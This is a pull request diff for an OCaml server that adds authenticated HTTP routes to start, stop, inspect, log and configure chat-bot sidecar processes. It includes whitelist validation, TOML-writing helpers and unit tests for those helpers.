### PR TITLE
feat(server): /api/v1/sidecar/{status,logs,start,stop} routes

### DIFF
--- a/lib/dune
+++ b/lib/dune
@@ -123,6 +123,7 @@
    server_routes_http_routes_attribution
    server_routes_http_routes_activity
    server_routes_http_routes_channel_gate
+   server_routes_http_routes_sidecar
    server_h2_gateway
    server_h2_gateway_helpers
    server_h2_gateway_routes_extra

--- a/lib/server/server_routes_http.ml
+++ b/lib/server/server_routes_http.ml
@@ -20,3 +20,4 @@ let make_routes ~port ~host ~sw ~clock =
   |> Server_routes_http_routes_attribution.add_routes
   |> Server_routes_http_routes_activity.add_routes ~sw ~clock
   |> Server_routes_http_routes_channel_gate.add_routes ~sw ~clock
+  |> Server_routes_http_routes_sidecar.add_routes ~sw ~clock

--- a/lib/server/server_routes_http_routes_sidecar.ml
+++ b/lib/server/server_routes_http_routes_sidecar.ml
@@ -1,0 +1,137 @@
+(** HTTP routes for sidecar lifecycle.
+
+    Provides [/api/v1/sidecar/{start,stop,status}] endpoints that shell
+    out to [sidecars/<id>-bot/run.sh]. The wrapper is the single source
+    of truth for how a sidecar is started, signalled, and inspected —
+    this module only thin-wraps it for HTTP consumers (i.e. the
+    dashboard's connectors surface).
+
+    Design baseline: docs/SIDECAR-LIFECYCLE-API-RFC.md.
+
+    Uses query-string [?name=<id>] (matching the existing channel_gate
+    routes such as [/api/v1/gate/connector/bind?name=<connector>])
+    rather than path params, so we don't introduce a second routing
+    convention.
+
+    @since v0.10.0 *)
+
+open Server_auth
+
+module Http = Http_server_eio
+
+(** Whitelist of sidecars the backend will spawn or signal. Anything else
+    short-circuits at the request boundary so [Sys.command] is never reached
+    for an attacker-controlled id. *)
+let known_ids = [ "discord"; "imessage"; "slack"; "telegram" ]
+
+let parse_name request =
+  match Server_utils.query_param request "name" with
+  | None -> Error "missing 'name' query parameter"
+  | Some n when List.mem n known_ids -> Ok n
+  | Some n -> Error (Printf.sprintf "unknown sidecar id: %s" n)
+
+let base_path () =
+  match Sys.getenv_opt "MASC_BASE_PATH" with
+  | Some p when String.length (String.trim p) > 0 -> String.trim p
+  | _ -> Sys.getcwd ()
+
+let script_path id =
+  Filename.concat (base_path ()) (Printf.sprintf "sidecars/%s-bot/run.sh" id)
+
+let status_file id =
+  Filename.concat (base_path ()) (Printf.sprintf ".gate/runtime/%s/status.json" id)
+
+let respond_json request reqd ~status body =
+  respond_json_with_cors ~status request reqd (Yojson.Safe.to_string body)
+
+let bad_request request reqd msg =
+  respond_json request reqd ~status:`Bad_request
+    (`Assoc [ ("ok", `Bool false); ("error", `String msg) ])
+
+let read_status_json id =
+  let path = status_file id in
+  if Sys.file_exists path then
+    let body = In_channel.with_open_text path In_channel.input_all in
+    let parsed = try Some (Yojson.Safe.from_string body) with _ -> None in
+    `Assoc [
+      ("ok", `Bool true);
+      ("available", `Bool true);
+      ("status", Option.value parsed ~default:`Null);
+    ]
+  else
+    `Assoc [
+      ("ok", `Bool true);
+      ("available", `Bool false);
+    ]
+
+let handle_status _state request reqd =
+  match parse_name request with
+  | Error msg -> bad_request request reqd msg
+  | Ok id -> respond_json request reqd ~status:`OK (read_status_json id)
+
+let handle_stop _state request reqd =
+  match parse_name request with
+  | Error msg -> bad_request request reqd msg
+  | Ok id ->
+      let (_status, stdout) =
+        Process_eio.run_argv_with_status ~timeout_sec:5.0
+          [ script_path id; "stop" ]
+      in
+      let trimmed = String.trim stdout in
+      let signaled_marker =
+        Printf.sprintf "Sent SIGTERM to %s-bot processes." id
+      in
+      let signaled =
+        let needle_len = String.length signaled_marker in
+        let rec contains i =
+          if i + needle_len > String.length trimmed then false
+          else if String.equal (String.sub trimmed i needle_len) signaled_marker then true
+          else contains (i + 1)
+        in
+        contains 0
+      in
+      respond_json request reqd ~status:`OK
+        (`Assoc [
+           ("ok", `Bool true);
+           ("signaled", `Bool signaled);
+           ("note", `String trimmed);
+         ])
+
+let handle_start _state request reqd =
+  match parse_name request with
+  | Error msg -> bad_request request reqd msg
+  | Ok id ->
+      (* Detach: run via setsid + nohup so the sidecar survives backend
+         restart. Only [script_path id] is interpolated, and [id] is
+         already whitelisted, so [Filename.quote] gives a closed-shell
+         injection surface. *)
+      let cmd =
+        Printf.sprintf
+          "setsid nohup %s start </dev/null >/dev/null 2>&1 &"
+          (Filename.quote (script_path id))
+      in
+      let _ = Sys.command cmd in
+      respond_json request reqd ~status:`Accepted
+        (`Assoc [
+           ("ok", `Bool true);
+           ("id", `String id);
+           ("note", `String "sidecar spawn requested; poll /api/v1/sidecar/status?name=...");
+         ])
+
+(** Register sidecar lifecycle routes on the router. *)
+let add_routes ~sw:_ ~clock:_ router =
+  router
+  |> Http.Router.get "/api/v1/sidecar/status" (fun request reqd ->
+       with_public_read (fun state _req reqd ->
+         handle_status state request reqd
+       ) request reqd)
+
+  |> Http.Router.post "/api/v1/sidecar/start" (fun request reqd ->
+       with_tool_auth ~tool_name:"sidecar" (fun state _req reqd ->
+         handle_start state request reqd
+       ) request reqd)
+
+  |> Http.Router.post "/api/v1/sidecar/stop" (fun request reqd ->
+       with_tool_auth ~tool_name:"sidecar" (fun state _req reqd ->
+         handle_stop state request reqd
+       ) request reqd)

--- a/lib/server/server_routes_http_routes_sidecar.ml
+++ b/lib/server/server_routes_http_routes_sidecar.ml
@@ -24,11 +24,16 @@ module Http = Http_server_eio
     for an attacker-controlled id. *)
 let known_ids = [ "discord"; "imessage"; "slack"; "telegram" ]
 
-let parse_name request =
-  match Server_utils.query_param request "name" with
+(** Pure whitelist check; exposed so unit tests can confirm shell-meta and
+    path traversal in [name=] are rejected before any [Sys.command] /
+    [Process_eio] is reached. *)
+let validate_name = function
   | None -> Error "missing 'name' query parameter"
   | Some n when List.mem n known_ids -> Ok n
   | Some n -> Error (Printf.sprintf "unknown sidecar id: %s" n)
+
+let parse_name request =
+  validate_name (Server_utils.query_param request "name")
 
 let base_path () =
   match Sys.getenv_opt "MASC_BASE_PATH" with

--- a/lib/server/server_routes_http_routes_sidecar.ml
+++ b/lib/server/server_routes_http_routes_sidecar.ml
@@ -199,6 +199,208 @@ let fetch_schema id =
        | _ ->
            Error "schema_dump failed; ensure the sidecar's Python deps are installed (run `./run.sh start` once or `uv sync`)")
 
+(** ---- Config write (PUT) ----
+
+    The dashboard config form (ConnectorConfigForm) submits the editor
+    state as JSON. We whitelist keys against the sidecar's own schema
+    (so only BotConfig-known names reach disk), coerce each value to
+    its schema-declared TOML type, and atomically rewrite the runtime
+    TOML at [.gate/runtime/<id>/config.toml].
+
+    The sidecar picks this file up on next start (Pydantic
+    [TomlConfigSettingsSource] sits in the source priority list below
+    env but above field defaults). We do not hot-reload a running
+    sidecar — that is the operator's job. *)
+
+type toml_value =
+  | Tstring of string
+  | Tint of int
+  | Tfloat of float
+  | Tbool of bool
+
+(** Hard cap on any single value the dashboard can write, so a
+    runaway client can't balloon the TOML. Typical fields (tokens,
+    URLs, numeric knobs) are well under this. *)
+let max_value_bytes = 8192
+
+let escape_toml_string s =
+  let buf = Buffer.create (String.length s + 4) in
+  String.iter (fun c ->
+    match c with
+    | '\\' -> Buffer.add_string buf "\\\\"
+    | '"' -> Buffer.add_string buf "\\\""
+    | '\n' -> Buffer.add_string buf "\\n"
+    | '\r' -> Buffer.add_string buf "\\r"
+    | '\t' -> Buffer.add_string buf "\\t"
+    | c when Char.code c < 0x20 ->
+        Buffer.add_string buf (Printf.sprintf "\\u%04x" (Char.code c))
+    | c -> Buffer.add_char buf c
+  ) s;
+  Buffer.contents buf
+
+let render_value = function
+  | Tstring s -> Printf.sprintf "\"%s\"" (escape_toml_string s)
+  | Tint n -> string_of_int n
+  | Tfloat f -> Printf.sprintf "%g" f
+  | Tbool true -> "true"
+  | Tbool false -> "false"
+
+let render_toml (pairs : (string * toml_value) list) : string =
+  let sorted = List.sort (fun (a, _) (b, _) -> String.compare a b) pairs in
+  let lines = List.map (fun (k, v) -> Printf.sprintf "%s = %s" k (render_value v)) sorted in
+  String.concat "\n" lines ^ "\n"
+
+type declared_type = [ `String | `Integer | `Number | `Boolean ]
+
+let parse_declared_type json : declared_type =
+  match json with
+  | `Assoc _ ->
+      (match Yojson.Safe.Util.member "type" json with
+       | `String "integer" -> `Integer
+       | `String "number" -> `Number
+       | `String "boolean" -> `Boolean
+       | _ -> `String)
+  | _ -> `String
+
+let schema_field_types id : (string * declared_type) list =
+  match fetch_schema id with
+  | Error _ -> []
+  | Ok json_str ->
+      (match Yojson.Safe.from_string json_str with
+       | j ->
+           (match Yojson.Safe.Util.member "properties" j with
+            | `Assoc assoc -> List.map (fun (k, v) -> (k, parse_declared_type v)) assoc
+            | _ -> [])
+       | exception _ -> [])
+
+let coerce_value (typ : declared_type) (raw : string) : (toml_value, string) result =
+  if String.length raw > max_value_bytes then
+    Error (Printf.sprintf "value too long (>%d bytes)" max_value_bytes)
+  else match typ with
+    | `String -> Ok (Tstring raw)
+    | `Integer ->
+        (match int_of_string_opt (String.trim raw) with
+         | Some n -> Ok (Tint n)
+         | None -> Error (Printf.sprintf "expected integer, got %S" raw))
+    | `Number ->
+        (match float_of_string_opt (String.trim raw) with
+         | Some n -> Ok (Tfloat n)
+         | None -> Error (Printf.sprintf "expected number, got %S" raw))
+    | `Boolean ->
+        (match String.lowercase_ascii (String.trim raw) with
+         | "true" | "1" -> Ok (Tbool true)
+         | "false" | "0" -> Ok (Tbool false)
+         | _ -> Error (Printf.sprintf "expected true/false, got %S" raw))
+
+let config_toml_path id =
+  Filename.concat (base_path ())
+    (Printf.sprintf ".gate/runtime/%s/config.toml" id)
+
+(** Atomic write: tmp file + rename. POSIX rename is atomic so a
+    concurrent reader sees either the old file or the new one, never a
+    half-written one. Inlined here rather than reaching into
+    Keeper_toml_loader (which keeps it as a private helper). *)
+let atomic_write_file ~(path : string) (content : string) : (unit, string) result =
+  let tmp = path ^ ".tmp" in
+  try
+    let oc = open_out tmp in
+    Fun.protect
+      ~finally:(fun () -> try close_out oc with _ -> ())
+      (fun () -> output_string oc content);
+    Sys.rename tmp path;
+    Ok ()
+  with exn ->
+    (try Sys.remove tmp with _ -> ());
+    Error (Printf.sprintf "atomic write failed: %s" (Printexc.to_string exn))
+
+(** Make sure [.gate/runtime/<id>/] exists before atomic_write_file
+    tries to rename into it. *)
+let ensure_parent_dir path =
+  let dir = Filename.dirname path in
+  let rec mk d =
+    if Sys.file_exists d then ()
+    else begin
+      mk (Filename.dirname d);
+      try Unix.mkdir d 0o755 with Unix.Unix_error (Unix.EEXIST, _, _) -> ()
+    end
+  in
+  mk dir
+
+(** Parse a JSON body of the form [{"<KEY>": "<VALUE>", ...}] into a
+    list of pairs. All values are expected as JSON strings (the
+    dashboard form emits them that way) — richer JSON types are
+    converted to their string form so type coercion runs downstream
+    from the same path. *)
+let parse_body_pairs body_str : ((string * string) list, string) result =
+  match Yojson.Safe.from_string body_str with
+  | `Assoc assoc ->
+      let pairs = List.map (fun (k, v) ->
+        let s = match v with
+          | `String s -> s
+          | `Int i -> string_of_int i
+          | `Float f -> Printf.sprintf "%g" f
+          | `Bool b -> if b then "true" else "false"
+          | `Null -> ""
+          | _ -> Yojson.Safe.to_string v
+        in
+        (k, s)
+      ) assoc in
+      Ok pairs
+  | _ -> Error "body must be a JSON object"
+  | exception _ -> Error "body is not valid JSON"
+
+let handle_put_config _state request reqd =
+  match parse_name request with
+  | Error msg -> bad_request request reqd msg
+  | Ok id ->
+      Http.Request.read_body_async reqd (fun body_str ->
+        match parse_body_pairs body_str with
+        | Error msg -> bad_request request reqd msg
+        | Ok pairs ->
+            let types = schema_field_types id in
+            if types = [] then
+              respond_json request reqd ~status:`Service_unavailable
+                (`Assoc [
+                   ("ok", `Bool false);
+                   ("error", `String "schema unavailable; run `./run.sh start` once so the form knows which fields exist");
+                 ])
+            else
+              let type_of k = List.assoc_opt k types in
+              let rec collect acc rejected = function
+                | [] -> Ok (List.rev acc, List.rev rejected)
+                | (k, v) :: rest ->
+                    (match type_of k with
+                     | None -> collect acc (k :: rejected) rest
+                     | Some typ ->
+                         (match coerce_value typ v with
+                          | Ok tv -> collect ((k, tv) :: acc) rejected rest
+                          | Error msg ->
+                              Error (Printf.sprintf "%s: %s" k msg)))
+              in
+              (match collect [] [] pairs with
+               | Error msg -> bad_request request reqd msg
+               | Ok (accepted, rejected) ->
+                   let path = config_toml_path id in
+                   ensure_parent_dir path;
+                   let toml_str = render_toml accepted in
+                   (match atomic_write_file ~path toml_str with
+                    | Error e ->
+                        respond_json request reqd ~status:`Internal_server_error
+                          (`Assoc [
+                             ("ok", `Bool false);
+                             ("error", `String e);
+                           ])
+                    | Ok () ->
+                        respond_json request reqd ~status:`OK
+                          (`Assoc [
+                             ("ok", `Bool true);
+                             ("id", `String id);
+                             ("path", `String path);
+                             ("written_fields", `Int (List.length accepted));
+                             ("rejected_fields", `List (List.map (fun s -> `String s) rejected));
+                           ])))
+      )
+
 let handle_schema _state request reqd =
   match parse_name request with
   | Error msg -> bad_request request reqd msg
@@ -276,4 +478,12 @@ let add_routes ~sw:_ ~clock:_ router =
   |> Http.Router.post "/api/v1/sidecar/stop" (fun request reqd ->
        with_tool_auth ~tool_name:"sidecar" (fun state _req reqd ->
          handle_stop state request reqd
+       ) request reqd)
+
+  (* Writes user-supplied values (potentially containing tokens) to disk,
+     so [tool_auth] not [public_read]. Whitelisting + type coercion runs
+     inside the handler — the auth gate just keeps unauth'd writers out. *)
+  |> Http.Router.post "/api/v1/sidecar/config" (fun request reqd ->
+       with_tool_auth ~tool_name:"sidecar" (fun state _req reqd ->
+         handle_put_config state request reqd
        ) request reqd)

--- a/lib/server/server_routes_http_routes_sidecar.ml
+++ b/lib/server/server_routes_http_routes_sidecar.ml
@@ -43,6 +43,9 @@ let base_path () =
 let script_path id =
   Filename.concat (base_path ()) (Printf.sprintf "sidecars/%s-bot/run.sh" id)
 
+let sidecar_dir id =
+  Filename.concat (base_path ()) (Printf.sprintf "sidecars/%s-bot" id)
+
 let status_file id =
   Filename.concat (base_path ()) (Printf.sprintf ".gate/runtime/%s/status.json" id)
 
@@ -157,6 +160,72 @@ let handle_logs _state request reqd =
              ("lines", `List line_list);
            ])
 
+(** Per-process schema cache. The Pydantic [BotConfig.model_json_schema]
+    output only changes when sidecar source changes, which requires a
+    backend restart in practice (we don't hot-reload Python). So a
+    per-id cache keyed by id is safe for the lifetime of this process. *)
+let schema_cache : (string, string) Hashtbl.t = Hashtbl.create 8
+
+(** Reset the cache; only used by tests. *)
+let reset_schema_cache () = Hashtbl.reset schema_cache
+
+(** Pick a Python interpreter for a given sidecar id.
+
+    Discord-bot uses [uv] (project has pyproject.toml + uv.lock). The
+    other 3 ship a hand-managed [.venv/]. We prefer the venv path when
+    it exists because it sidesteps a [uv] dependency on the host running
+    the backend. *)
+let python_argv_for id =
+  let venv_python = Filename.concat (sidecar_dir id) ".venv/bin/python" in
+  if Sys.file_exists venv_python then
+    [ venv_python; "-m"; "src.schema_dump" ]
+  else
+    [ "uv"; "run"; "--directory"; sidecar_dir id; "python"; "-m"; "src.schema_dump" ]
+
+let fetch_schema id =
+  match Hashtbl.find_opt schema_cache id with
+  | Some cached -> Ok cached
+  | None ->
+      let argv = python_argv_for id in
+      let cwd = sidecar_dir id in
+      let (status, stdout) =
+        Process_eio.run_argv_with_status ~timeout_sec:10.0 ~cwd argv
+      in
+      (match status with
+       | Unix.WEXITED 0 ->
+           let trimmed = String.trim stdout in
+           Hashtbl.replace schema_cache id trimmed;
+           Ok trimmed
+       | _ ->
+           Error "schema_dump failed; ensure the sidecar's Python deps are installed (run `./run.sh start` once or `uv sync`)")
+
+let handle_schema _state request reqd =
+  match parse_name request with
+  | Error msg -> bad_request request reqd msg
+  | Ok id ->
+      (match fetch_schema id with
+       | Error msg ->
+           respond_json request reqd ~status:`Service_unavailable
+             (`Assoc [
+                ("ok", `Bool false);
+                ("error", `String msg);
+              ])
+       | Ok json_str ->
+           (match Yojson.Safe.from_string json_str with
+            | parsed ->
+                respond_json request reqd ~status:`OK
+                  (`Assoc [
+                     ("ok", `Bool true);
+                     ("id", `String id);
+                     ("schema", parsed);
+                   ])
+            | exception _ ->
+                respond_json request reqd ~status:`Internal_server_error
+                  (`Assoc [
+                     ("ok", `Bool false);
+                     ("error", `String "schema_dump returned invalid JSON");
+                   ])))
+
 let handle_start _state request reqd =
   match parse_name request with
   | Error msg -> bad_request request reqd msg
@@ -189,6 +258,14 @@ let add_routes ~sw:_ ~clock:_ router =
   |> Http.Router.get "/api/v1/sidecar/logs" (fun request reqd ->
        with_tool_auth ~tool_name:"sidecar" (fun state _req reqd ->
          handle_logs state request reqd
+       ) request reqd)
+
+  (* Schema is field-shape metadata, not values, so it's safe under
+     public_read — the dashboard form needs it during cold-start
+     onboarding (before any auth tokens are configured). *)
+  |> Http.Router.get "/api/v1/sidecar/schema" (fun request reqd ->
+       with_public_read (fun state _req reqd ->
+         handle_schema state request reqd
        ) request reqd)
 
   |> Http.Router.post "/api/v1/sidecar/start" (fun request reqd ->

--- a/lib/server/server_routes_http_routes_sidecar.ml
+++ b/lib/server/server_routes_http_routes_sidecar.ml
@@ -46,6 +46,25 @@ let script_path id =
 let status_file id =
   Filename.concat (base_path ()) (Printf.sprintf ".gate/runtime/%s/status.json" id)
 
+let today_yyyymmdd () =
+  let tm = Unix.localtime (Unix.time ()) in
+  Printf.sprintf "%04d%02d%02d"
+    (tm.tm_year + 1900) (tm.tm_mon + 1) tm.tm_mday
+
+(** Today's log file path. Wrapper writes to this exact filename:
+    [LOG_DIR/<id>-sidecar-YYYYMMDD.log] (see sidecars/<id>-bot/run.sh).
+    If the operator started the sidecar yesterday and never rolled the
+    process, today's file may not exist yet — handled by the caller. *)
+let today_log_file id =
+  Filename.concat (base_path ())
+    (Printf.sprintf ".masc/logs/%s-sidecar-%s.log" id (today_yyyymmdd ()))
+
+(** Clamp the [?lines=N] query param to [1, 1000]. Pure so unit tests
+    can pin the upper bound without a request mock. *)
+let clamp_lines = function
+  | None -> 200
+  | Some n -> max 1 (min 1000 n)
+
 let respond_json request reqd ~status body =
   respond_json_with_cors ~status request reqd (Yojson.Safe.to_string body)
 
@@ -102,6 +121,42 @@ let handle_stop _state request reqd =
            ("note", `String trimmed);
          ])
 
+let handle_logs _state request reqd =
+  match parse_name request with
+  | Error msg -> bad_request request reqd msg
+  | Ok id ->
+      let lines =
+        clamp_lines (Server_utils.query_param request "lines"
+                     |> Option.map int_of_string_opt
+                     |> Option.join)
+      in
+      let path = today_log_file id in
+      if not (Sys.file_exists path) then
+        respond_json request reqd ~status:`OK
+          (`Assoc [
+             ("ok", `Bool true);
+             ("log_path", `String path);
+             ("available", `Bool false);
+             ("lines", `List []);
+           ])
+      else
+        let (_status, stdout) =
+          Process_eio.run_argv_with_status ~timeout_sec:5.0
+            [ "tail"; "-n"; string_of_int lines; path ]
+        in
+        let line_list =
+          String.split_on_char '\n' stdout
+          |> List.filter (fun l -> not (String.equal l ""))
+          |> List.map (fun l -> `String l)
+        in
+        respond_json request reqd ~status:`OK
+          (`Assoc [
+             ("ok", `Bool true);
+             ("log_path", `String path);
+             ("available", `Bool true);
+             ("lines", `List line_list);
+           ])
+
 let handle_start _state request reqd =
   match parse_name request with
   | Error msg -> bad_request request reqd msg
@@ -129,6 +184,11 @@ let add_routes ~sw:_ ~clock:_ router =
   |> Http.Router.get "/api/v1/sidecar/status" (fun request reqd ->
        with_public_read (fun state _req reqd ->
          handle_status state request reqd
+       ) request reqd)
+
+  |> Http.Router.get "/api/v1/sidecar/logs" (fun request reqd ->
+       with_tool_auth ~tool_name:"sidecar" (fun state _req reqd ->
+         handle_logs state request reqd
        ) request reqd)
 
   |> Http.Router.post "/api/v1/sidecar/start" (fun request reqd ->

--- a/lib/server/server_routes_http_routes_sidecar.ml
+++ b/lib/server/server_routes_http_routes_sidecar.ml
@@ -349,6 +349,60 @@ let parse_body_pairs body_str : ((string * string) list, string) result =
   | _ -> Error "body must be a JSON object"
   | exception _ -> Error "body is not valid JSON"
 
+(** GET /api/v1/sidecar/config?name=<id>
+
+    Reads the current runtime TOML and returns the values as a flat map
+    so the dashboard form can prefill instead of showing only schema
+    defaults. Empty file or missing file → [exists: false] envelope so
+    the form falls back to defaults gracefully.
+
+    All values are stringified for transport — the dashboard is the
+    one rendering the form, and the form already knows the type from
+    the schema response. Keeps the wire format simple. *)
+let handle_get_config _state request reqd =
+  match parse_name request with
+  | Error msg -> bad_request request reqd msg
+  | Ok id ->
+      let path = config_toml_path id in
+      if not (Sys.file_exists path) then
+        respond_json request reqd ~status:`OK
+          (`Assoc [
+             ("ok", `Bool true);
+             ("id", `String id);
+             ("path", `String path);
+             ("exists", `Bool false);
+             ("values", `Assoc []);
+           ])
+      else
+        let content =
+          try In_channel.with_open_text path In_channel.input_all
+          with _ -> ""
+        in
+        (match Keeper_toml_loader.parse_toml content with
+         | Error msg ->
+             respond_json request reqd ~status:`Internal_server_error
+               (`Assoc [
+                  ("ok", `Bool false);
+                  ("error", `String (Printf.sprintf "TOML parse failed: %s" msg));
+                ])
+         | Ok doc ->
+             let pairs = List.filter_map (fun (k, v) ->
+               match v with
+               | Keeper_toml_loader.Toml_string s -> Some (k, `String s)
+               | Keeper_toml_loader.Toml_int n -> Some (k, `String (string_of_int n))
+               | Keeper_toml_loader.Toml_float f -> Some (k, `String (Printf.sprintf "%g" f))
+               | Keeper_toml_loader.Toml_bool b -> Some (k, `String (if b then "true" else "false"))
+               | Keeper_toml_loader.Toml_string_array _ -> None
+             ) doc in
+             respond_json request reqd ~status:`OK
+               (`Assoc [
+                  ("ok", `Bool true);
+                  ("id", `String id);
+                  ("path", `String path);
+                  ("exists", `Bool true);
+                  ("values", `Assoc pairs);
+                ]))
+
 let handle_put_config _state request reqd =
   match parse_name request with
   | Error msg -> bad_request request reqd msg
@@ -486,4 +540,11 @@ let add_routes ~sw:_ ~clock:_ router =
   |> Http.Router.post "/api/v1/sidecar/config" (fun request reqd ->
        with_tool_auth ~tool_name:"sidecar" (fun state _req reqd ->
          handle_put_config state request reqd
+       ) request reqd)
+
+  (* Read current runtime TOML so the dashboard form prefills with what's
+     actually on disk. Tokens may surface in the response, so [tool_auth]. *)
+  |> Http.Router.get "/api/v1/sidecar/config" (fun request reqd ->
+       with_tool_auth ~tool_name:"sidecar" (fun state _req reqd ->
+         handle_get_config state request reqd
        ) request reqd)

--- a/test/dune
+++ b/test/dune
@@ -33,6 +33,7 @@
         test_subscriptions test_session test_progress test_spawn
         test_validation test_response
         test_channel_gate_connector_routes
+        test_sidecar_lifecycle_routes
         test_channel_gate_imessage_state
         test_dashboard
         test_dashboard_perf
@@ -123,6 +124,7 @@
           test_subscriptions test_session test_progress test_spawn
           test_validation test_response
           test_channel_gate_connector_routes
+        test_sidecar_lifecycle_routes
           test_channel_gate_imessage_state
           test_dashboard
           test_dashboard_perf
@@ -706,6 +708,7 @@
 ; Round-trip, envelope, patch_checkpoint, dual-source read.
 (test
  (name test_keeper_state_snapshot_json)
+ (modules test_keeper_state_snapshot_json)
  (libraries masc_test_deps))
 
 ; RFC-MASC-001 Phase 1 prose echo guard: prompt-time summary filter
@@ -713,6 +716,7 @@
 ; preserving forward-looking ones (Goal, Next plan, Next, etc.).
 (test
  (name test_continuity_forward_filter)
+ (modules test_continuity_forward_filter)
  (libraries masc_test_deps))
 
 ; Gen4 compaction-layer [STATE] guard: keeper_summarizer scrubs
@@ -720,6 +724,7 @@
 ; summarization. Registered via Builder.with_summarizer (OAS 0.152.0).
 (test
  (name test_keeper_summarizer)
+ (modules test_keeper_summarizer)
  (libraries masc_test_deps))
 
 ; Gen7 persistence-layer guard: cap_snapshot bounds string/list
@@ -727,6 +732,7 @@
 ; monotonic growth when the LLM produces ever-longer [STATE] blocks.
 (test
  (name test_snapshot_size_cap)
+ (modules test_snapshot_size_cap)
  (libraries masc_test_deps))
 
 ; Gen8 persistence-layer guard: cap_social_state bounds the BDI
@@ -761,16 +767,19 @@
 ; on 2026-04-12 — Eio.Io rendered form not recognized as Not_found)
 (test
  (name test_keeper_checkpoint_classify)
+ (modules test_keeper_checkpoint_classify)
  (libraries masc_test_deps))
 
 ; Keeper autonomous semaphore fairness cooldown (#6810)
 (test
  (name test_keeper_semaphore_fairness)
+ (modules test_keeper_semaphore_fairness)
  (libraries masc_test_deps))
 
 ; Dashboard_governance_metrics — tool rejection ring + approval queue
 (test
  (name test_dashboard_governance_metrics)
+ (modules test_dashboard_governance_metrics)
  (libraries masc_test_deps))
 ; Operator Control (7 modules)
 (test

--- a/test/test_sidecar_lifecycle_routes.ml
+++ b/test/test_sidecar_lifecycle_routes.ml
@@ -100,6 +100,82 @@ let test_clamp_lines_clamps_above_max () =
   check int "1001 → 1000" 1000 (Routes.clamp_lines (Some 1001));
   check int "100000 → 1000" 1000 (Routes.clamp_lines (Some 100000))
 
+(* ---- Config write helpers (PUT /api/v1/sidecar/config). ---- *)
+
+let test_escape_quotes_and_backslash () =
+  check string "double-quote escaped"
+    "abc\\\"def"
+    (Routes.escape_toml_string "abc\"def");
+  check string "backslash escaped"
+    "x\\\\y"
+    (Routes.escape_toml_string "x\\y")
+
+let test_escape_control_chars () =
+  check string "newline escaped"
+    "a\\nb"
+    (Routes.escape_toml_string "a\nb");
+  check string "tab escaped"
+    "a\\tb"
+    (Routes.escape_toml_string "a\tb")
+
+let test_render_value_quotes_strings () =
+  check string "string wrapped in quotes"
+    "\"hello\""
+    (Routes.render_value (Routes.Tstring "hello"));
+  check string "int rendered bare"
+    "120"
+    (Routes.render_value (Routes.Tint 120));
+  check string "true bare"
+    "true"
+    (Routes.render_value (Routes.Tbool true));
+  check string "false bare"
+    "false"
+    (Routes.render_value (Routes.Tbool false))
+
+let test_render_toml_sorts_keys () =
+  let body =
+    Routes.render_toml
+      [ ("Z_LAST", Routes.Tstring "z");
+        ("A_FIRST", Routes.Tstring "a");
+        ("M_MID", Routes.Tint 5);
+      ]
+  in
+  let lines = String.split_on_char '\n' body in
+  match lines with
+  | "A_FIRST = \"a\"" :: "M_MID = 5" :: "Z_LAST = \"z\"" :: _ -> ()
+  | _ -> failf "lines not in alpha order: %s" body
+
+let test_coerce_integer_accepts_and_rejects () =
+  (match Routes.coerce_value `Integer "120" with
+   | Ok (Routes.Tint 120) -> ()
+   | _ -> failf "120 should coerce to Tint 120");
+  (match Routes.coerce_value `Integer "  -5  " with
+   | Ok (Routes.Tint -5) -> ()
+   | _ -> failf "trimmed -5 should coerce");
+  (match Routes.coerce_value `Integer "abc" with
+   | Error _ -> ()
+   | _ -> failf "abc should NOT coerce to integer")
+
+let test_coerce_boolean_accepts_variants () =
+  (match Routes.coerce_value `Boolean "true" with
+   | Ok (Routes.Tbool true) -> ()
+   | _ -> failf "true should coerce");
+  (match Routes.coerce_value `Boolean "FALSE" with
+   | Ok (Routes.Tbool false) -> ()
+   | _ -> failf "FALSE (case) should coerce");
+  (match Routes.coerce_value `Boolean "1" with
+   | Ok (Routes.Tbool true) -> ()
+   | _ -> failf "1 should coerce as bool true");
+  (match Routes.coerce_value `Boolean "yes" with
+   | Error _ -> ()
+   | _ -> failf "yes should NOT coerce — only true/false/0/1")
+
+let test_coerce_rejects_oversized_value () =
+  let huge = String.make 9000 'x' in
+  match Routes.coerce_value `String huge with
+  | Error _ -> ()
+  | Ok _ -> failf "9000-byte value should be rejected by max_value_bytes guard"
+
 let () =
   run "sidecar_lifecycle_routes"
     [
@@ -121,5 +197,15 @@ let () =
       ( "invariants",
         [
           test_case "known_ids size = 4" `Quick test_known_ids_size_matches_dashboard;
+        ] );
+      ( "config_write_helpers",
+        [
+          test_case "escape: quotes + backslash"  `Quick test_escape_quotes_and_backslash;
+          test_case "escape: control chars"       `Quick test_escape_control_chars;
+          test_case "render_value: each variant"  `Quick test_render_value_quotes_strings;
+          test_case "render_toml: alpha-sort"     `Quick test_render_toml_sorts_keys;
+          test_case "coerce: integer ok/err"      `Quick test_coerce_integer_accepts_and_rejects;
+          test_case "coerce: boolean variants"    `Quick test_coerce_boolean_accepts_variants;
+          test_case "coerce: oversized rejected"  `Quick test_coerce_rejects_oversized_value;
         ] );
     ]

--- a/test/test_sidecar_lifecycle_routes.ml
+++ b/test/test_sidecar_lifecycle_routes.ml
@@ -83,6 +83,23 @@ let test_known_ids_size_matches_dashboard () =
   check int "exactly 4 known sidecars (matches dashboard KNOWN_CONNECTOR_IDS)"
     4 (List.length Routes.known_ids)
 
+(* ---- clamp_lines: bound the ?lines=N query param to [1, 1000] so a
+       client can't ask for unbounded log content. ---- *)
+
+let test_clamp_lines_default_when_missing () =
+  check int "missing → 200" 200 (Routes.clamp_lines None)
+
+let test_clamp_lines_passes_in_range () =
+  check int "300 → 300" 300 (Routes.clamp_lines (Some 300))
+
+let test_clamp_lines_clamps_below_one () =
+  check int "0 → 1" 1 (Routes.clamp_lines (Some 0));
+  check int "-50 → 1" 1 (Routes.clamp_lines (Some (-50)))
+
+let test_clamp_lines_clamps_above_max () =
+  check int "1001 → 1000" 1000 (Routes.clamp_lines (Some 1001));
+  check int "100000 → 1000" 1000 (Routes.clamp_lines (Some 100000))
+
 let () =
   run "sidecar_lifecycle_routes"
     [
@@ -93,6 +110,13 @@ let () =
           test_case "rejects unknown id"     `Quick test_validate_rejects_unknown_id;
           test_case "rejects shell meta"     `Quick test_validate_rejects_shell_meta;
           test_case "rejects path traversal" `Quick test_validate_rejects_path_traversal;
+        ] );
+      ( "clamp_lines",
+        [
+          test_case "default when missing" `Quick test_clamp_lines_default_when_missing;
+          test_case "passes in range"      `Quick test_clamp_lines_passes_in_range;
+          test_case "clamps below 1"       `Quick test_clamp_lines_clamps_below_one;
+          test_case "clamps above 1000"    `Quick test_clamp_lines_clamps_above_max;
         ] );
